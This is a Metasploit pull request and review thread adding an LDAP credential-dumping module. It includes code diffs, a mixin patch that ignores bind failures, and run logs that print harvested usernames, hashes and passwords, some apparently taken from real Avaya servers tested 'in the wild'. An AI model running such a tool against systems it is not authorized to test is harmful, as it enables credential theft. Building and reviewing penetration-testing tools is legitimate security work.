### PR TITLE
Add generic LDAP hashdump module

### PR DESCRIPTION
**Pull request by HynekPetrak**
This PR adds a new module that dumps LDAP data via anonymous or authenticated (added to LDAP mixin) bind. 
Looting the dumped LDIF and searching for common attributes that usually hold user credentials, e.g. userPassword.

TODO: test the LDAP authentication

Here is an example running the module against LDAP server of Avaya Communication manager, those server ususally do not require an authentication to dump credentials (not sure if there is any CVE on that, maybe I should create one):

```
msf5 > use auxiliary/gather/ldap_hashdump
msf5 auxiliary(gather/ldap_hashdump) > options

Module options (auxiliary/gather/ldap_hashdump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BASE_DN                     no        LDAP base DN if you already have it
   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      389              yes       The target port
   SSL        false            no        Enable SSL on the LDAP connection
   USER_ATTR  dn               no        LDAP attribute, that contains username


Auxiliary action:

   Name  Description
   ----  -----------
   Dump  Dump all LDAP data


msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
RHOSTS => [redacted_ip_address]

msf5 auxiliary(gather/ldap_hashdump) > run
[*] Running module against [redacted_ip_address]

[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=vsp
[*] Dumping LDAP data from server at [redacted_ip_address]:389
[*] Storing LDAP data in loot
[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121633_default_[redacted_ip_address]_LDAPInformation_716210.txt
[*] Searching for attribute: userPassword
[*] Taking dn attribute as username
[+] Credentials found: uid=cust,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
[+] Credentials found: uid=admin,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
[*] Auxiliary module execution completed
msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
USER_ATTR => uid
msf5 auxiliary(gather/ldap_hashdump) > run
[*] Running module against [redacted_ip_address]

[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=vsp
[*] Dumping LDAP data from server at [redacted_ip_address]:389
[*] Storing LDAP data in loot
[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121718_default_[redacted_ip_address]_LDAPInformation_712562.txt
[*] Searching for attribute: userPassword
[*] Taking uid attribute as username
[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
[*] Auxiliary module execution completed
msf5 auxiliary(gather/ldap_hashdump) >

```

### CODE REVIEW

**Comment by HynekPetrak** [comment]
@wvu-r7 @h00die FYI

File: documentation/modules/auxiliary/gather/ldap_hashdump.md [hunk 1]
```diff
@@ -0,0 +1,143 @@
+## Vulnerable Application
+
+### Description
+
+This module uses an LDAP connection to dump data from LDAP server
+using an annonymous or authenticated bind.
```
Comment (bcoles) [inline documentation/modules/auxiliary/gather/ldap_hashdump.md:6]:
```suggestion
using an anonymous or authenticated bind.
```

File: documentation/modules/auxiliary/gather/ldap_hashdump.md [hunk 2]
```diff
@@ -0,0 +1,143 @@
...
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+Dump all LDAP data from the vCenter Server.
```
Comment (bcoles) [inline documentation/modules/auxiliary/gather/ldap_hashdump.md:22]:
```suggestion
Dump all LDAP data from the LDAP server.
```

File: modules/auxiliary/gather/ldap_hashdump.rb [hunk 3]
```diff
@@ -0,0 +1,197 @@
...
+    end
+
+    service_details = {
+      workspace_id: myworkspace_id,
+      module_fullname: fullname,
+      origin_type: :service,
+      address: rhost,
+      port: rport,
+      protocol: 'tcp',
+      service_name: 'avaya/ldap'
```
Comment (bcoles) [inline modules/auxiliary/gather/ldap_hashdump.rb:150]:
```suggestion
      service_name: 'ldap'
```

?

**Comment by smcintyre-r7** [comment]
> Tested in the wild. No setup notes available at this time, as setup will be specific to target environment.

Do you have any steps that you could provide us on setting up an environment that would be suitable for testing and demonstrating this module? Is this something we can spin up with like OpenLDAP and are there any configuration settings that need to be made in order for it to be vulnerable? Any assistance you can provide us here will speed up the processing of your contribution.

**Comment by wvu-r7** [comment]
@smcintyre-r7: That was copied from my module doc. We had our own target. That said, I've more recently been able to set up vCenter Server or just plain OpenLDAP in a pinch.

**Comment by HynekPetrak** [comment]
Hi @smcintyre-r7, I have added a test scenario using a dockerized OpenLDAP server, that is made intentionally insecure. HTH Otherwise I've tested the module on numerous LDAP servers in wild, various brands.

File: modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb [hunk 4]
```diff
@@ -105,7 +105,7 @@ def run
 
   def pillage(entries)
     # TODO: Make this more efficient?
-    ldif = entries.map(&:to_ldif).join("\n")
+    ldif = entries.map(&:to_ldif).map{|s| s.force_encoding('utf-8')}.join("\n")
```
Comment (wvu-r7) [inline modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb:108]: Lint this, too. Thanks.

**Comment by HynekPetrak** [comment]
I intend to add support for multiple naming contexts within one target

**Comment by HynekPetrak** [comment]
Currently performing a mass test, identifying and fixing edge cases.

**Comment by smcintyre-r7** [comment]
> Currently performing a mass test, identifying and fixing edge cases.

Okay, that sounds great thank you! It definitely looks like you're actively working on this, so I'm going to go ahead and convert it to a draft PR and when you're all done and ready for it to be reviewed just press the "Ready for review" button on GitHub towards the bottom of the PR.

**Comment by HynekPetrak** [comment]
Hi @smcintyre-r7 , @wvu-r7  I believe the code is ready for a review. I've been doing very large test on various LDAP servers and possibly caught or worked around majority of the issues. Due to performance I made the module as Scanner to leverage multi threading.

**Comment by HynekPetrak** [comment]
Is there a chance to make it draft PR again? I found one more thing to improve - pwdhistory and passwordhistory handling.

**Comment by smcintyre-r7** [comment]
> Is there a chance to make it draft PR again? I found one more thing to improve - pwdhistory and passwordhistory handling.

Done! Convert it back when you're ready.

**Comment by HynekPetrak** [comment]
@smcintyre-r7 no more changes planned

**Comment by wvu-r7** [comment]
Fantastic effort! Thank you for doing this.

**Comment by HynekPetrak** [comment]
Please for patience, since I started with ruby 2-3 weeks ago. Can’t write idiomatic ruby yet.

**Comment by HynekPetrak** [comment]
Apparently I'm not catching all the cases with the `Timeout` control. Is there a way, while a module is running to interrupt it and see the stack trace?

**Comment by smcintyre-r7** [comment]
You'd need to use a debugger, I generally like the one built into RubyMine.

**Comment by HynekPetrak** [comment]
Ok, I found the issue. The Net::LDAP#open does 3 things:
- creates new LDAP object
- opens connection
- attempts LDAP bind operation (authentication)

Apparently  the bind operation is not controlled by the connect_timeout and the code may hang on certain servers.
Need to fix this in the next commit.

**Comment by HynekPetrak** [comment]
@smcintyre-r7, @wvu-r7 ready for the review.

**Comment by HynekPetrak** [comment]
For the monkey patch in the last commit I have submitted an issue to the net-ldap library:
https://github.com/ruby-ldap/ruby-net-ldap/issues/375

File: modules/auxiliary/gather/ldap_hashdump.rb [hunk 5]
```diff
@@ -0,0 +1,422 @@
...
+    end
+
+    # Safe if server did not returned anything
+    unless base_dn_vuln
+      print_error("#{peer} Host seems to be safe")
+      return Exploit::CheckCode::Safe
+    end
+
+    # HACK: Stash discovered base DN in CheckCode reason
+    Exploit::CheckCode::Vulnerable(base_dn_vuln)
```
Comment (smcintyre-r7) [inline modules/auxiliary/gather/ldap_hashdump.rb:230]: Where is this going though? There isn't a check method defined.

**Review by smcintyre-r7 — CHANGES_REQUESTED** [review]
Left a few comments through out. A few things I noticed:

* All of the `CheckCode` uses should be changed to `fail_with`, you don't define a `check` method so there's no place those values are going. Using `fail_with` instead will report [why](https://github.com/rapid7/metasploit-framework/wiki/Handling-Module-Failures-with-%60fail_with%60#comprehensive-list-of-fail_with-parameters) the module can't continue.
* The multiple uses of `ldap.search` should be moved into a module functions. They're all pretty similiar and it would reduce the repeat code around the temporary file and timeout handling.

**Review by HynekPetrak — COMMENTED** [review]
moved the ldap.search to its function and done the other changes. see the conversations.

File: modules/auxiliary/gather/ldap_hashdump.rb [hunk 6]
```diff
@@ -0,0 +1,395 @@
...
+      # We observe some servers base64 encdode the hash string
+      # and add {crypt} prefix to the base64 encoded value
+      # e2NyeXB0f in base64 means {crypt
+      # e3NtZD is {smd
+      if hash.starts_with?(/{crypt}(e2NyeXB0f|e3NtZD)/)
+        begin
+          hash = Base64.strict_decode64(hash.delete_prefix('{crypt}'))
+        rescue ArgumentError
+          nil
+        end
```
Comment (smcintyre-r7) [inline modules/auxiliary/gather/ldap_hashdump.rb:295]: You can inline these 5 lines to

```suggestion
hash = Base64.strict_decode64(hash.delete_prefix('{crypt}')) rescue ArgumentError
```

File: lib/msf/core/exploit/ldap.rb [hunk 7]
```diff
@@ -7,83 +7,160 @@
...
+    end
 
-  def rport
-    datastore['RPORT']
-  end
+    def ldap_connect(opts = {}, &block)
+      connect_opts = {
+        host: rhost,
+        port: rport,
+        connect_timeout: datastore['ConnectTimeout']
```
Comment (smcintyre-r7) [inline lib/msf/core/exploit/ldap.rb:43]: This and any other use should have been updated to `LDAP::ConnectTimeout`.

**Review by smcintyre-r7 — COMMENTED** [review]
> @smcintyre-r7 I cannot use the fail_with. Once called for one host it aborts the whole module run, i.e for the other threads too. This is not desired.
That's right, I've been meaning to see if we can fix that. In the meantime returning like you are is fine, :+1: 

The questionable `Timeout.timeout` has been consolidated down into 2 instances within the module so given the constraints we're operating in with regards to `Net::LDAP` that seems reasonable.

I'll start testing this out now, I left a few minor comments but nothing that I can't address myself during testing.

File: lib/msf/core/exploit/ldap.rb [hunk 8]
```diff
@@ -7,83 +7,160 @@
...
     end
 
-    Net::LDAP.open(connect_opts.merge(opts), &block)
-  end
+    def ldap_new(opts = {})
+      connect_opts = {
+        host: rhost,
+        port: rport,
+        connect_timeout: datastore['ConnectTimeout']
+      }
```
Comment (smcintyre-r7) [inline lib/msf/core/exploit/ldap.rb:73]: These two functions `ldap_connect` and `ldap_new` need to be consolidated. Add a new option for the timeout you need to add so that the remaining sections are not repeated.

Something like this:
```suggestion
    def ldap_connect(opts = {}, &block)
      connect_opts = {
        host: rhost,
        port: rport,
        connect_timeout: datastore['ConnectTimeout']
      }

      if datastore['SSL']
        connect_opts[:encryption] = {
          method: :simple_tls,
          tls_options: {
            verify_mode: OpenSSL::SSL::VERIFY_NONE
          }
        }
      end

      if datastore['BIND_DN']
        connect_opts[:auth] = {
          method: :simple,
          username: datastore['BIND_DN']
        }
        if datastore['BIND_PW']
          connect_opts[:auth][:password] = datastore['BIND_PW']
        end
      end

      dap = Net::LDAP.new(connect_opts.merge(opts))

      if connect_opts.fetch(:ignore_bind_errors, false)
        # monkey patch ldap object in order to ignore bind errors  Some servers (e.g. OpenLDAP) return result even after a
        # bind  has failed, e.g. with LDAP_INAPPROPRIATE_AUTH - anonymous bind disallowed.  See:
        # https://www.openldap.org/doc/admin23/security.html#Authentication%20Methods  "Note that disabling the anonymous
        # bind mechanism does not prevent anonymous  access to the directory."   Bug created for Net:LDAP
        # https://github.com/ruby-ldap/ruby-net-ldap/issues/375
        def ldap.use_connection(args)
          if @open_connection
            yield @open_connection
          else
            begin
              conn = new_connection
              conn.bind(args[:auth] || @auth)
              # Commented out vs. original
              # result = conn.bind(args[:auth] || @auth)
              # return result unless result.result_code == Net::LDAP::ResultCodeSuccess
              yield conn
            ensure
              conn.close if conn
            end
          end
        end
      end

      ldap
    end
```

You can then specicify `ignore_bind_errors` in the connection options from your module.

**Comment by smcintyre-r7** [comment]
While testing this with the docker container you provided I noticed that the module prints an error on a connection error but it continues to run showing that it's not properly identifying an error that should cause it to just exit. Note the SSL connection error in the following output (because I set `SSL` to `true` when it should be `false`) yet the module continues on to "Dumping data for root DSE", I would have expected it to I identify that the connection failed and exit.

```
msf5 auxiliary(gather/ldap_hashdump) > show options 

Module options (auxiliary/gather/ldap_hashdump):

   Name          Current Setting                                                                                                         Required  Description
   ----          ---------------                                                                                                         --------  -----------
   BASE_DN                                                                                                                               no        LDAP base DN if you already have it
   BIND_DN                                                                                                                               no        The username to authenticate to LDAP server
   BIND_PW                                                                                                                               no        Password for the BIND_DN
   MAX_LOOT                                                                                                                              no        Maximum number of LDAP entries to loot
   PASS_ATTR     userPassword, sambantpassword, sambalmpassword, mailuserpassword, password, pwdhistory, passwordhistory, clearpassword  yes       LDAP attribute, that contains password hashes
   READ_TIMEOUT  600                                                                                                                     no        LDAP read timeout in seconds
   RHOSTS        127.0.0.1                                                                                                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         1389                                                                                                                    yes       The target port
   SSL           true                                                                                                                    no        Enable SSL on the LDAP connection
   THREADS       1                                                                                                                       yes       The number of concurrent threads (max one per host)
   USER_ATTR     dn                                                                                                                      no        LDAP attribute(s), that contains username


Auxiliary action:

   Name  Description
   ----  -----------
   Dump  Dump all LDAP data


msf5 auxiliary(gather/ldap_hashdump) > run

[*] 127.0.0.1:1389        Connecting ...
[-] 127.0.0.1:1389        Net::LDAP::Error: SSL_connect SYSCALL returned=5 errno=0 state=SSLv3/TLS write client hello
[*] 127.0.0.1:1389        Dumping data for root DSE
[-] 127.0.0.1:1389        No entries returned for 'root DSE'.
[-] 127.0.0.1:1389        Net::LDAP::Error: SSL_connect SYSCALL returned=5 errno=0 state=SSLv3/TLS write client hello
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(gather/ldap_hashdump) >
```

**Comment by wvu-r7** [comment]
@HynekPetrak, @smcintyre-r7: Please ensure that the existing LDAP modules continue to function with the mixin changes. Thanks!

**Comment by HynekPetrak** [comment]
@smcintyre-r7 , 
- consolidated the ldap_new and ldap_connect as much they can. They call LDAP#new and LDAP#open respectively, so they cannot be completely merged.
- removed `rescue` of LDAP exceptions from the mixin, which prevented the module from detecting the SSL errors.
- fixed handling of `LDAP::ConnectTimeout`

File: lib/msf/core/exploit/ldap.rb (hunk 7 above)
Comment (HynekPetrak) [reply lib/msf/core/exploit/ldap.rb]: corrected

File: modules/auxiliary/gather/ldap_hashdump.rb (hunk 6 above)
Comment (HynekPetrak) [reply modules/auxiliary/gather/ldap_hashdump.rb:295]: Seems my previous comment has not been saved, hope this time ....
Intent of my code was not to modify the `hash` value, if the `ArgumentError` gets raised. The one liner behaves differently:
```
irb(main):001:0> require "base64"
=> true
irb(main):002:0> hash = '{crypt}11111'
irb(main):003:0> hash = Base64.strict_decode64(hash.delete_prefix('{crypt}')) rescue ArgumentError
irb(main):004:0> hash
=> ArgumentError
irb(main):005:0> hash = '{crypt}11111'
irb(main):006:1* begin
irb(main):007:1*   hash = Base64.strict_decode64(hash.delete_prefix('{crypt}'))
irb(main):008:1* rescue ArgumentError
irb(main):009:1*   nil
irb(main):010:0> end
=> nil
irb(main):011:0> hash
=> "{crypt}11111"

```

File: modules/auxiliary/gather/ldap_hashdump.rb [hunk 9]
```diff
@@ -0,0 +1,395 @@
...
+          private_type: :password
+        ))
+      else
+        create_credential(service_details.merge(
+          username: dn,
+          private_data: hash,
+          private_type: :nonreplayable_hash,
+          jtr_format: hash_format
+        ))
+      end
```
Comment (smcintyre-r7) [inline modules/auxiliary/gather/ldap_hashdump.rb:389]: I think the reporting here is incomplete. I think what you want is:
```suggestion
      if hash_format.nil? || hash_format.empty?
        credential = create_credential(service_details.merge(
          username: dn,
          private_data: hash,
          private_type: :password
        ))
      else
        credential = create_credential(service_details.merge(
          username: dn,
          private_data: hash,
          private_type: :nonreplayable_hash,
          jtr_format: hash_format
        ))
      end

      create_credential_login({
        core: credential,
        access_level: 'User',
        status: Metasploit::Model::Login::Status::UNTRIED
      }.merge(service_details))
```

Without the `create_credential_login` call, the host and service fields are not populated in the `creds` output, and the `creds -d` command (to delete all credentials for another round of testing) fails with a stack trace.

Comment (HynekPetrak) [reply modules/auxiliary/gather/ldap_hashdump.rb]: Thanks, actually I wasn't sure, what's the purpose of 'create_credentail_login'.

**Comment by smcintyre-r7** [comment]
I just did some git surgery on this PR. I squashed the commit history down from the 59 commits to one, rebased onto master and then updated the module to again use `fail_with`. The rebase onto master brought in the changes which fixed using `fail_with` from scanners. Once the unit tests pass, I'll get this merged in.

Thanks alot for all of your work on this @HynekPetrak!

**Comment by smcintyre-r7** [comment]
Tested successfully,  added those tweaks I mentioned in commit aa60b4efc0d69.

Test run using the provided docker image:
```
msf6 auxiliary(gather/ldap_hashdump) > show options 

Module options (auxiliary/gather/ldap_hashdump):

   Name          Current Setting                                                                                                         Required  Description
   ----          ---------------                                                                                                         --------  -----------
   BASE_DN                                                                                                                               no        LDAP base DN if you already have it
   BIND_DN                                                                                                                               no        The username to authenticate to LDAP server
   BIND_PW                                                                                                                               no        Password for the BIND_DN
   MAX_LOOT                                                                                                                              no        Maximum number of LDAP entries to loot
   PASS_ATTR     userPassword, sambantpassword, sambalmpassword, mailuserpassword, password, pwdhistory, passwordhistory, clearpassword  yes       LDAP attribute, that contains password hashes
   READ_TIMEOUT  600                                                                                                                     no        LDAP read timeout in seconds
   RHOSTS        192.168.159.127-128                                                                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         1389                                                                                                                    yes       The target port
   SSL           false                                                                                                                   no        Enable SSL on the LDAP connection
   THREADS       1                                                                                                                       yes       The number of concurrent threads (max one per host)
   USER_ATTR     dn                                                                                                                      no        LDAP attribute(s), that contains username


Auxiliary action:

   Name  Description
   ----  -----------
   Dump  Dump all LDAP data


msf6 auxiliary(gather/ldap_hashdump) > run

[*] 192.168.159.127:1389  Connecting...
[*] 192.168.159.127:1389  LDAP connection established
[*] 192.168.159.127:1389  Discovering base DN(s) automatically
[*] 192.168.159.127:1389  Getting root DSE
[-] unexpected-reply: Exception occurred: Net::LDAP::Error: No route to host - connect(2) for 192.168.159.127:1389
[*] Scanned 1 of 2 hosts (50% complete)
[*] 192.168.159.128:1389  Connecting...
[*] 192.168.159.128:1389  LDAP connection established
[*] 192.168.159.128:1389  Discovering base DN(s) automatically
[*] 192.168.159.128:1389  Getting root DSE
dn: 
namingcontexts: dc=example,dc=org
supportedcontrol: 2.16.840.1.113730.3.4.18
supportedcontrol: 2.16.840.1.113730.3.4.2
supportedcontrol: 1.3.6.1.4.1.4203.1.10.1
supportedcontrol: 1.3.6.1.1.22
supportedcontrol: 1.2.840.113556.1.4.319
supportedcontrol: 1.2.826.0.1.3344810.2.3
supportedcontrol: 1.3.6.1.1.13.2
supportedcontrol: 1.3.6.1.1.13.1
supportedcontrol: 1.3.6.1.1.12
supportedextension: 1.3.6.1.4.1.4203.1.11.1
supportedextension: 1.3.6.1.4.1.4203.1.11.3
supportedextension: 1.3.6.1.1.8
supportedfeatures: 1.3.6.1.1.14
supportedfeatures: 1.3.6.1.4.1.4203.1.5.1
supportedfeatures: 1.3.6.1.4.1.4203.1.5.2
supportedfeatures: 1.3.6.1.4.1.4203.1.5.3
supportedfeatures: 1.3.6.1.4.1.4203.1.5.4
supportedfeatures: 1.3.6.1.4.1.4203.1.5.5
supportedldapversion: 3

[*] 192.168.159.128:1389  Taking 'dn' attribute as username
[*] 192.168.159.128:1389  Dumping data for root DSE
[*] 192.168.159.128:1389  1 entries, 0 creds found in 'root DSE'.
[*] 192.168.159.128:1389  Storing LDAP data for base DN='root DSE' in loot
[+] 192.168.159.128:1389  Saved LDAP data to /home/smcintyre/.msf4/loot/20200827095138_default_192.168.159.128_root_DSE_028933.txt
[*] 192.168.159.128:1389  Searching base DN='dc=example,dc=org'
[+] 192.168.159.128:1389  Credentials (password) found in userpassword: cn=user01,ou=users,dc=example,dc=org:password1
[+] 192.168.159.128:1389  Credentials (password) found in userpassword: cn=user02,ou=users,dc=example,dc=org:password2
[*] 192.168.159.128:1389  5 entries, 2 creds found in 'dc=example,dc=org'.
[*] 192.168.159.128:1389  Storing LDAP data for base DN='dc=example,dc=org' in loot
[+] 192.168.159.128:1389  Saved LDAP data to /home/smcintyre/.msf4/loot/20200827095139_default_192.168.159.128_example.org_806059.txt
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ldap_hashdump) >
```

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds a generic module for dumping passwords and hashes stored as attributes in LDAP servers.
